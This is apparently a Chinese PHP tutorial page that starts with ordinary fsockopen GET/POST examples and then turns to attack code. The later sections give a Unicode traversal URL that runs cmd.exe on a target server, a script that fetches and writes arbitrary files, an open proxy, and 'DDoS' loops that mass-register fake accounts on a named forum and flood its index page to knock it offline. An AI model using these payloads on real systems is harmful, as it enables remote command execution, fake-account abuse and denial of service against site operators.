要使用PHP的POST&GET,可以运用fsockopen函数:
例子 1. fsockopen() Example
<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$out = "GET / HTTP/1.1\r\n";
$out .= "Host: example.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fputs($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
}
?>
例子 2. Using UDP connection
<?php
$fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
echo "ERROR: $errno - $errstr<br />\n";
} else {
fwrite($fp, "\n");
echo fread($fp, 26);
fclose($fp);
}
?>
例子 3
<?php
//定义一些连接参数
$urls = array(
'host'=>'localhost',
'port'=>80,
'path'=>'/index.php',
'method'=>'POST',
'protocol'=>'1.0',
);
//POST方法传递的参数
$ps = array(
'language'=>'php',
'linux'=>'redhat',
);
//GET方法传递的参数
$gs = array(
'php'=>5,
'redhat'=>9
);
/**
返回:得到POST或GET方法后返回的字符串(string)
参数:
$usls : string
$ps : array
$gs : array
调用方法:
getData($urls,$ps,'') //使用POST方法
getData($urls,'',$gs) //使用GET方法
参考资料:http://cn.php.net/manual/en/function.fsockopen.php
*/
function getData($urls,$ps='',$gs=''){
$host = $urls['host'];
$port = $urls['port'];
$path = $urls['path'];
$method = $urls['method'];
$protocol = $urls['protocol'];
$posts = '';
$gets = '';
if(is_array($ps)){
foreach($ps as $k => $v){
$posts .= urlencode($k)."=".urlencode($v).'&';
}
$posts = substr($posts,0,-1);
$len = strlen($posts);
}
if(is_array($gs)){
foreach($gs as $k => $v){
$gets .= urlencode($k)."=".urlencode($v).'&';
}
$gets = substr($gets,0,-1);
}
$fp = fsockopen($host, $port,$errno,$errstr,3);
if(!$fp){
echo "can't connect...\r\n<br>Error:$errstr";
return ;
}
fputs($fp, "$method $path?$gets HTTP/$protocol\r\n");
fputs($fp, "Host: localhost\r\n");
if($posts != ''){
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-Length: $len\r\n");
fputs($fp, "\r\n");
fputs($fp, $posts);
}
fputs($fp, "Connection: Close\r\n\r\n");
$s = '';
do{
$data = fgets($fp,1024);
if($data == '') {
break;
}
$s .= $data;
} while(true);
fclose($fp);
return $s;
}
//这里是使用POST方法取得目标网页返回的字符串
echo getData($urls,$ps,'');
//如果要使用GET方法就用如下方式:
echo getData($urls,'',$gs);
?>
三、UNICODE漏洞攻击
代码:
<?php
$fp=@fopen($url,"r") or die ("cannot open $url");
while($line=@fgets($fp,1024)) {
$contents.=$line;
}
echo $contents; //显示文件内容
fclose($fp); //关闭文件
?>
使用:
/XXXX.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir
四、WEB间文件转移:
该例子的代码引自PHP FLAME:
<?php
$fp = fopen($_GET['filename'], 'rb');
$data = $tmp = '';
while ( true ) {
$tmp = fgets($fp, 1024);
if ( 0 === strlen($tmp) ) {
break;
}
$data .= $tmp;
}
fclose($fp);
$file=preg_replace("/^.+\//","",$filename);
//write
$fp = fopen("$file", 'wb');
fwrite($fp, $data);
fclose($fp);
?>
五、HTTP代理(http://jsw.china12e.com/600/)
代码引自PHP FLAME:
<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url))
{
echo "example:<br>xxx.php?http://jsw.china12e.com/<;br>";
exit;
}
if($url)
$url=str_replace("\\","/",$url);
$f=@fopen($url,"r");
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);
fclose($f);
}
$rooturl = preg_replace("/(.+\/)(.*)/i","\\1",$url);
$a = preg_replace("/(src[[:space:]]*=['\"])([^h].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'\"].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'\"].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=[^'\"])(.*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['\"])(.*?)/is","\\1$rooturl\\2",$a);
echo $a;
?>
六:不可阻挡DDOS攻击
DDOS的一个例子
<?php
$url="http://bbs.icehack.com/register.php?step=2&addpassword=
aaaaaa&addpassword2=aaaaaa&addemail=asdfasd@dfsadsf.com&addusername=";
for($i=1131;$i<=1150;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
运行后论坛将新增20个用户
(例子:http://bbs.icehack.com/userlist.php?page=827)
当把它用在论坛的搜索中时
DDOS攻击就实现了
以下的代码攻击INDEX.PHP文件,同时运行十个进程时,可能时论坛关闭
<?php
$url="http://bbs.icehack.com/index.php?addusername=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
七、SQL INJECTION攻击,搜索引擎。。
|